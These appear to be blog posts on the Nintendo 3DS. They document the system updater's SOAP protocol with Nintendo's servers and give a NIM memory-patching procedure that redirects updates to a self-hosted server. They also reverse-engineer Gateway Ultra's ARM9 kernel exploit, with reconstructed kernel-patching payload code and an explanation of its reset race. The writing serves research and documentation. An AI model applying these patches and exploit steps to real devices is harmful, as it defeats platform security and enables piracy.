Nintendo 3DS System Updater

Since there isn’t much public documentation on how the 3DS updater and the NIM module work, I thought I should write something up.

SSL

The 3DS talks with the Nintendo update servers (as well as eShop) through SSL with a client certificate that is common to all 3DS consoles. The client certificate, its private key, and the Nintendo root CA are found in the title 0004001B00010002. The two files found inside the title’s RomFS are additionally encrypted. The SSL system module decrypts the files and stores them in the process heap. The certificate, key, and root CA are all stored in DER format, so you may want to convert them to PKCS12 format before using them to communicate with NUS on your own.
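As a rough sketch of the first half of that conversion, Python's standard `ssl` module can re-wrap a DER certificate as PEM, which is the form most tools expect as input when building a PKCS12 bundle. This only covers the certificate and the root CA. The private key needs its own PEM header, which depends on how the key is encoded, and that is not covered here. The helper names are made up for illustration.

```python
import ssl


def der_to_pem(der_bytes: bytes) -> str:
    """Wrap raw DER certificate bytes in a PEM envelope (base64 plus header/footer)."""
    return ssl.DER_cert_to_PEM_cert(der_bytes)


def pem_to_der(pem_text: str) -> bytes:
    """Inverse of der_to_pem, useful to confirm nothing was lost."""
    return ssl.PEM_cert_to_DER_cert(pem_text)
```

In practice you would read the decrypted certificate dump with `open(path, "rb").read()` and write the returned string to a `.pem` file.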

NIM

The NIM module is how the 3DS communicates with Nintendo’s servers through SOAP (and over SSL). The following is a typical update process.

The following request is made to https://nus.c.shop.nintendowifi.net/nus/services/NetUpdateSOAP (potentially identifying information is stripped out):

POST /nus/services/NetUpdateSOAP HTTP/1.1
User-Agent: CTR NUP 040600 Mar 14 2012 13:32:39
Connection: Keep-Alive
Accept-Charset: UTF-8
Content-type: text/xml; charset=utf-8
SOAPAction: urn:nus.wsapi.broadon.com/GetSystemTitleHash
com.broadon.RequesterName: unitTest
com.broadon.RequesterHash: zzz
com.broadon.RequesterTimestamp: 1427146068799
Transfer-Encoding: chunked

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:nus="urn:nus.wsapi.broadon.com">
<SOAP-ENV:Body>
<nus:GetSystemTitleHash xsi:type="nus:GetSystemTitleHashRequestType">
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-142714927</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
</nus:GetSystemTitleHash>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
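For anyone who wants to reproduce this request by hand, here is a minimal sketch that builds the same envelope with Python's standard library. The function name and its parameters are my own. The element names and namespaces are taken from the capture above, and the HTTP headers and client certificate handling are left out.

```python
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
XSI = "http://www.w3.org/2001/XMLSchema-instance"
NUS = "urn:nus.wsapi.broadon.com"


def build_title_hash_request(device_id, message_id, region="JPN", country="JP"):
    """Return the GetSystemTitleHash SOAP body as UTF-8 bytes."""
    # Use the same prefixes as the captured request.
    ET.register_namespace("SOAP-ENV", SOAP_ENV)
    ET.register_namespace("xsi", XSI)
    ET.register_namespace("nus", NUS)

    envelope = ET.Element(f"{{{SOAP_ENV}}}Envelope")
    body = ET.SubElement(envelope, f"{{{SOAP_ENV}}}Body")
    call = ET.SubElement(body, f"{{{NUS}}}GetSystemTitleHash")
    call.set(f"{{{XSI}}}type", "nus:GetSystemTitleHashRequestType")

    fields = (
        ("Version", "1.0"),
        ("MessageId", message_id),
        ("DeviceId", device_id),
        ("RegionId", region),
        ("CountryCode", country),
    )
    for tag, value in fields:
        ET.SubElement(call, f"{{{NUS}}}{tag}").text = value

    return ET.tostring(envelope, encoding="utf-8", xml_declaration=True)
```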

Since the 3DS firmware is a collection of “titles” that can be updated independently, the updater has to make sure each title is up to date. To save time, it first gets a hash and checks if anything needs to be updated. The server responds:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetSystemTitleHashResponse xmlns="urn:nus.wsapi.broadon.com">
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-154274329</MessageId>
<TimeStamp>1427146232957</TimeStamp>
<ErrorCode>0</ErrorCode>
<TitleHash>7E745F7B67D553BEA847859404790C93</TitleHash>
</GetSystemTitleHashResponse>
</soapenv:Body>
</soapenv:Envelope>
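The hash check itself is simple enough to sketch. The snippet below pulls TitleHash out of a response like the one above and compares it with a locally stored hash. How NIM actually stores or computes the local hash is not something I have looked at, so `local_hash` is just a stand-in value.

```python
import xml.etree.ElementTree as ET

NUS_NS = {"nus": "urn:nus.wsapi.broadon.com"}


def extract_title_hash(response_xml):
    """Return the TitleHash value from a GetSystemTitleHashResponse."""
    root = ET.fromstring(response_xml)
    node = root.find(".//nus:TitleHash", NUS_NS)
    if node is None or not node.text:
        raise ValueError("response has no TitleHash element")
    return node.text.strip().upper()


def needs_update(response_xml, local_hash):
    """True when the server hash differs from the local one."""
    return extract_title_hash(response_xml) != local_hash.strip().upper()
```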

If the title hash matches the current system’s hash, then the updater exits. Otherwise, it continues and makes a request to https://ecs.c.shop.nintendowifi.net/ecs/services/ECommerceSOAP to get the latest update server URLs:

POST /ecs/services/ECommerceSOAP HTTP/1.1
User-Agent: CTR NUP 040600 Mar 14 2012 13:32:39
Connection: Keep-Alive
Accept-Charset: UTF-8
Content-type: text/xml; charset=utf-8
SOAPAction: urn:ecs.wsapi.broadon.com/GetAccountStatus
com.broadon.RequesterName: unitTest
com.broadon.RequesterHash: zzz
com.broadon.RequesterTimestamp: 1427146232982
Transfer-Encoding: chunked
Host: ecs.c.shop.nintendowifi.net

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ecs="urn:ecs.wsapi.broadon.com">
<SOAP-ENV:Body>
<ecs:GetAccountStatus xsi:type="ecs:GetAccountStatusRequestType">
<ecs:Version>2.0</ecs:Version>
<ecs:MessageId>EC-xxx-143998661</ecs:MessageId>
<ecs:DeviceId>xxx</ecs:DeviceId>
<ecs:DeviceToken>yyy</ecs:DeviceToken>
<ecs:AccountId>yyy</ecs:AccountId>
<ecs:ApplicationId>0004013000002c02</ecs:ApplicationId>
<ecs:TIN>1234</ecs:TIN>
<ecs:Region>JPN</ecs:Region>
<ecs:Country>JP</ecs:Country>
<ecs:Language>ja</ecs:Language>
<ecs:SerialNo>zzz</ecs:SerialNo>
<ecs:ECVersion>EC 4.6.0 Mar 14 2012 13:32:39</ecs:ECVersion>
<ecs:Locale>ja_JP</ecs:Locale>
<ecs:ServiceLevel>SYSTEM</ecs:ServiceLevel>
</ecs:GetAccountStatus>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

and the server responds with the URLs to use:

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetAccountStatusResponse xmlns="urn:ecs.wsapi.broadon.com">
<Version>2.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-121712521</MessageId>
<TimeStamp>1427134562983</TimeStamp>
<ErrorCode>0</ErrorCode>
<ServiceStandbyMode>false</ServiceStandbyMode>
<AccountStatus>R</AccountStatus>
<ServiceURLs>
<Name>ContentPrefixURL</Name>
<URI>http://ccs.cdn.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>UncachedContentPrefixURL</Name>
<URI>https://ccs.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>SystemContentPrefixURL</Name>
<URI>http://nus.cdn.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>SystemUncachedContentPrefixURL</Name>
<URI>https://ccs.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>EcsURL</Name>
<URI>https://ecs.c.shop.nintendowifi.net/ecs/services/ECommerceSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>IasURL</Name>
<URI>https://ias.c.shop.nintendowifi.net/ias/services/IdentityAuthenticationSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>CasURL</Name>
<URI>https://cas.c.shop.nintendowifi.net/cas/services/CatalogingSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>NusURL</Name>
<URI>https://nus.c.shop.nintendowifi.net/nus/services/NetUpdateSOAP</URI>
</ServiceURLs>
</GetAccountStatusResponse>
</soapenv:Body>
</soapenv:Envelope>
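If you are scripting this, the ServiceURLs entries are easiest to work with as a name-to-URI mapping. A minimal sketch with the standard library follows. The function name is my own, and it assumes the response has the same shape as the capture above.

```python
import xml.etree.ElementTree as ET

ECS_NS = {"ecs": "urn:ecs.wsapi.broadon.com"}


def parse_service_urls(response_xml):
    """Map each ServiceURLs <Name> to its <URI>."""
    root = ET.fromstring(response_xml)
    urls = {}
    for entry in root.iterfind(".//ecs:ServiceURLs", ECS_NS):
        name = entry.findtext("ecs:Name", namespaces=ECS_NS)
        uri = entry.findtext("ecs:URI", namespaces=ECS_NS)
        if name and uri:
            urls[name] = uri
    return urls
```

The next request would then go to `parse_service_urls(response)["NusURL"]`.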

Now, NIM sends the full list of title versions on the system as the next request to the SOAP server defined in NusURL.

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:nus="urn:nus.wsapi.broadon.com">
<SOAP-ENV:Body>
<nus:GetSystemUpdate xsi:type="nus:GetSystemUpdateRequestType">
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-147358457</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
<nus:Language>ja</nus:Language>
<nus:SerialNo>zzz</nus:SerialNo>
<nus:TitleVersion>
<nus:TitleId>1126106602178562</nus:TitleId>
<nus:Version>10</nus:Version>
</nus:TitleVersion>

<nus:TitleVersion>
<nus:TitleId>1126106065308162</nus:TitleId>
<nus:Version>7168</nus:Version>
</nus:TitleVersion>
</nus:GetSystemUpdate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
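One detail that is easy to miss: the TitleId values in this request look like decimal renderings of the usual 16-digit hexadecimal title IDs. That reading is an inference from the numbers in the capture, not something the protocol states. A small sketch for converting between the two forms:

```python
def title_id_to_hex(decimal_id):
    """Decimal TitleId string (as in the request) to 16-digit hex."""
    return format(int(decimal_id), "016X")


def title_id_to_decimal(hex_id):
    """16-digit hex title ID to the decimal string form."""
    return str(int(hex_id, 16))
```

For example, `title_id_to_hex("1126106602178562")` gives `0004003020008802`.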

The server responds with the versions and metadata of all the titles corresponding to the device type and region.

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetSystemUpdateResponse xmlns="urn:nus.wsapi.broadon.com">
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>1</MessageId>
<TimeStamp>1414627502761</TimeStamp>
<ErrorCode>0</ErrorCode>
<ContentPrefixURL>http://nus.cdn.c.shop.nintendowifi.net/ccs/download</ContentPrefixURL>
<UncachedContentPrefixURL>https://ccs.c.shop.nintendowifi.net/ccs/download</UncachedContentPrefixURL>
<TitleVersion>
<TitleId>0004001000021000</TitleId>
<Version>8203</Version>
<FsSize>4931584</FsSize>
<TicketSize>848</TicketSize>
<TMDSize>4708</TMDSize>
</TitleVersion>

<TitleVersion>
<TitleId>0004013820000202</TitleId>
<Version>4816</Version>
<FsSize>1032192</FsSize>
<TicketSize>848</TicketSize>
<TMDSize>4660</TMDSize>
</TitleVersion>
<UploadAuditData>1</UploadAuditData>
<TitleHash>7E745F7B67D553BEA847859404790C93</TitleHash>
</GetSystemUpdateResponse>
</soapenv:Body>
</soapenv:Envelope>
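Since the response lists every title for the device and region, the client has to compare it against what is installed. The sketch below shows that comparison under my own assumptions about the data shapes: `server_titles` is a list of (title ID, version) pairs parsed from the response, and `installed` maps title IDs to installed versions. It splits the result into titles that are new to the system and titles that are merely outdated.

```python
def plan_update(server_titles, installed):
    """Return (new_titles, outdated_titles) as lists of (title_id, version)."""
    new_titles = []
    outdated_titles = []
    for title_id, version in server_titles:
        current = installed.get(title_id)
        if current is None:
            new_titles.append((title_id, version))       # not on the system yet
        elif version > current:
            outdated_titles.append((title_id, version))  # newer version on the server
    return new_titles, outdated_titles
```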

If any titles are new to the system, NIM will request to get the common ticket for those titles.

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:nus="urn:nus.wsapi.broadon.com">
<SOAP-ENV:Body>
<nus:GetSystemCommonETicket xsi:type="nus:GetSystemCommonETicketRequestType">
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-170576756</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
<nus:Language>ja</nus:Language>
<nus:SerialNo>zzz</nus:SerialNo>
<nus:TitleId>0004001000021000</nus:TitleId>

<nus:TitleId>000400DB20016302</nus:TitleId>
</nus:GetSystemCommonETicket>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server returns base64 encoded tickets for each title. It also returns a certificate chain for the tickets. As an aside, common tickets are used to sign firmware components. Regular games use tickets tied to a specific account (not “common”).

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetSystemCommonETicketResponse xmlns="urn:nus.wsapi.broadon.com">
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-244400570</MessageId>
<TimeStamp>1427142110949</TimeStamp>
<ErrorCode>0</ErrorCode>
<CommonETicket>…</CommonETicket>

<CommonETicket>…</CommonETicket>
<Certs>…</Certs>
<Certs>…</Certs>
</GetSystemCommonETicketResponse>
</soapenv:Body>
</soapenv:Envelope>

Now, the system is ready to download the updated titles. For each title in the GetSystemUpdateResponse, if the version is higher than the current installed version, NIM first gets the title metadata from the ContentPrefixURL. For example, downloading version 8203 of title 0004001000021000 will be from: http://ccs.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/tmd.8203?deviceId=xxx&accountId=zzz

It then parses the title metadata, which contains a list of content archives to download. For the example above, it will download http://nus.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/00000043 and http://nus.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/00000045
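The URL layout from the examples above can be sketched as two small helpers. The names are my own. I am assuming content IDs are rendered as eight hex digits, which fits the two examples but is not confirmed beyond them, and the deviceId/accountId query string is left out.

```python
def tmd_url(prefix, title_id, version):
    """URL of the title metadata for a specific version."""
    return f"{prefix}/{title_id}/tmd.{version}"


def content_url(prefix, title_id, content_id):
    """URL of one content archive; content_id is the integer ID from the TMD."""
    return f"{prefix}/{title_id}/{content_id:08X}"
```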

Once all the titles are downloaded, it makes another GetSystemTitleHash request (presumably to check if there’s an update released while the device was being updated).

More Information

For more information on downloading titles from Nintendo CDN, check out Rely’s CDN downloader script. For more information on talking with Nintendo’s SOAP servers, check out yellows8’s ninupdates (you need the client certificate and key from the SSL module as described above) or his update reports. These tools were indispensable for figuring out the updater.

Appendix: Updating N3DS 8.1.0-0J to 9.2.0-20J

The motivation behind figuring out how the update process worked was so I could manually update my Japanese N3DS from the stock 8.1 (which does not support ninjhax) to 9.2 (the last version that supports ninjhax). I’ll quickly describe how it is done, but since the process is a bit involved, I would not recommend that anyone inexperienced try it (you can easily brick the console or accidentally update to the latest version). I only attempted this on a Japanese N3DS going from 8.1.0-0J to 9.2.0-20J, but it should work with other configurations provided you get the right files and offsets.

Prerequisites

  • Cubic Ninja
  • NTR CFW 2.0 and NTR Debugger
  • A web server with support for some kind of scripting language (PHP for example)
  • Clear any pending update by entering recovery mode and exiting (I don’t think this is needed but better safe than sorry)

Steps

  1. Host the SOAP response for the version you want to update to on your web server. You can find all the raw SOAP responses from yellows8’s update report site. For example, here is the one for 9.1.0-20J. According to yellows8, there was a bug and his bot did not capture 9.2.0-20J. However, since there were only two titles changed in that update, I just manually crafted a 9.2.0-20J response.
  2. Host the SOAP response for the update title hash. Here is the template. You need to change the value of the TitleHash to match the TitleHash at the end of your update response from step 1.
  3. Create a script that responds with one of the two SOAP responses above depending on whether the SOAPAction request header is “urn:nus.wsapi.broadon.com/GetSystemUpdate” or “urn:nus.wsapi.broadon.com/GetSystemTitleHash”. I made a two-line PHP script called “update.php” that does this.
  4. Host the SOAP response for getting the server URLs. The template for this is here. You only need to change the value of NusURL to point to your NUS responder script created in step 3. (In my case, it would be http://myhost.com/update.php)
  5. Boot your 3DS into NTR CFW 2.0 and connect the debugger
  6. Use listprocess() to get the PID for “nim”. On 8.1.0-0J, it should be 0x25.
  7. Patch NIM to use your server for NetUpdateSOAP (this offset is for 8.1.0-0J): write(0x15E424, tuple(map(ord, "http://myhost.com/update.php\0")), pid=0x25)
  8. Patch NIM to use your server for ECommerceSOAP. Since you’re only responding to GetAccountStatus, it is okay to hard code this: write(0x15E0EC, tuple(map(ord, "http://myhost.com/GetAccountStatus_response.xml\0")), pid=0x25)
  9. Do the same for another reference to ECommerceSOAP: write(0x15E463, tuple(map(ord, "http://myhost.com/GetAccountStatus_response.xml\0")), pid=0x25)
  10. Go into system settings, and perform an update (do NOT exit system settings as you will lose your patches and will have to perform them again after restarting).
  11. Once the update is done, you will be prompted to restart. However, because you are in NTR mode, the screen will just go black, so you need to hold the power button and manually restart.
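The responder script from step 3 does not have to be PHP. Here is a rough Python equivalent built on the standard library's `http.server`. The two response file names are hypothetical placeholders for the files hosted in steps 1 and 2, and the handler does not bother reading the chunked request body, which was enough for my purposes in the PHP version but is an assumption here.

```python
from http.server import BaseHTTPRequestHandler

# SOAPAction value -> canned response file (file names are placeholders)
RESPONSES = {
    "urn:nus.wsapi.broadon.com/GetSystemUpdate": "GetSystemUpdate_response.xml",
    "urn:nus.wsapi.broadon.com/GetSystemTitleHash": "GetSystemTitleHash_response.xml",
}


def pick_response_file(soap_action):
    """Choose the canned response for a SOAPAction header value, or None."""
    action = (soap_action or "").strip().strip('"')
    return RESPONSES.get(action)


class UpdateHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        name = pick_response_file(self.headers.get("SOAPAction"))
        if name is None:
            self.send_error(404, "unknown SOAPAction")
            return
        with open(name, "rb") as f:
            body = f.read()
        self.send_response(200)
        self.send_header("Content-Type", "text/xml; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
```

To serve it, pass `UpdateHandler` to `http.server.HTTPServer(("", 80), UpdateHandler)` and call `serve_forever()`.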

Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the interesting (from a security perspective) functionalities are handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signature/verification. In this post, we will look at how to run (privileged) code on the ARM9 processor with privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically, there are a couple of steps where I do not know whether they are done for the sake of the exploit or purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.

Code

For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
{
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  invalidate_dcache();
  invalidate_icache();
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  invalidate_dcache();
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot
}

// not called directly, offset determines jump
void jump_table(void)
{
  func_patch_hook();
  reboot_func();
}

void func_patch_hook(void)
{
  // data written from entry
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);
  int i; // loop counter for the busy spins below

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}");
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_sync(pxi_regs);
  pxi_send(pxi_regs, 0x10000);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0" :: "m" (func_hook_return));
}

// this is a patched version of function 0xFFFF097C
// stuff found in the original code are skipped
void reboot_func(void)
{
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload
  ...
}

Memory Configurations

A quick side-note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface called the PXI, which is used to pass data between the two processors. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided proper cache coherency). However, there is one region (physical 0x08000000 to 0x08100000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only uses one-to-one virtual memory addressing (i.e. physical addresses and virtual addresses are the same), but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it makes patches to two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early on. Second, it patches the function at 0xFFFF097C (I believe this function is run after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.
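Both patches use the same 8-byte trampoline: the instruction 0xE51FF004 (ldr pc, [pc, #-4]) followed by the destination address. In ARM state the PC reads as the instruction's address plus 8, so [pc, #-4] is the word immediately after the instruction. The sketch below packs such a trampoline and computes where the literal sits. The helper names are mine and this only illustrates the encoding, it is not a tool for patching anything.

```python
import struct

LDR_PC_PC_MINUS_4 = 0xE51FF004  # ldr pc, [pc, #-4]


def make_hook(target):
    """Little-endian bytes for 'ldr pc, [pc, #-4]' followed by the target address."""
    return struct.pack("<II", LDR_PC_PC_MINUS_4, target & 0xFFFFFFFF)


def literal_address(instr_addr):
    """Address the ldr reads from: PC (instr + 8) minus 4."""
    return instr_addr + 8 - 4
```

For the first patch in the listing, `literal_address(0xFFF84DD4)` is 0xFFF84DD8, which is exactly where the hook address is written.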

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (ex: for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing the execution.

At the same time in the ARM9 processor, Process9 now waits for a special command, 0x44836 from PXI, in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series of commands to put Process9 into function 0x0807B97C, however that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0x24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0x08000000-0x08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset ToCTToU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.
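To make the race concrete, here is a toy model of the check and the later use. Shared FCRAM is a plain dictionary, and the ARM11 side is a callback that runs between the two reads. Everything here is a simulation under my own naming. The real window depends on timing between the two processors, which this does not model.

```python
ARM9_PRIVATE = range(0x08000000, 0x08100000)
ENTRY_SLOT = 0x2400000C  # function pointer in the shared FCRAM buffer


def arm9_reset(shared, between_check_and_use=None):
    """Validate the entry pointer, then read it again later and 'jump' to it."""
    if shared[ENTRY_SLOT] not in ARM9_PRIVATE:          # time of check
        raise ValueError("entry point outside ARM9 private memory")
    if between_check_and_use is not None:
        between_check_and_use(shared)                   # ARM11 gets to run here
    return shared[ENTRY_SLOT]                           # time of use


def arm11_overwrite(shared):
    """What the patched ARM11 reset function does: swap in the FCRAM payload."""
    shared[ENTRY_SLOT] = 0x23F00000
```

Without the callback, the function returns the original pointer. With `arm11_overwrite`, the check still passes but the returned address is the payload in FCRAM.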

Conclusions

I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0x10000 through PXI and what does PDN register 0x230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra Stage 2: Owning ARM11 Kernel

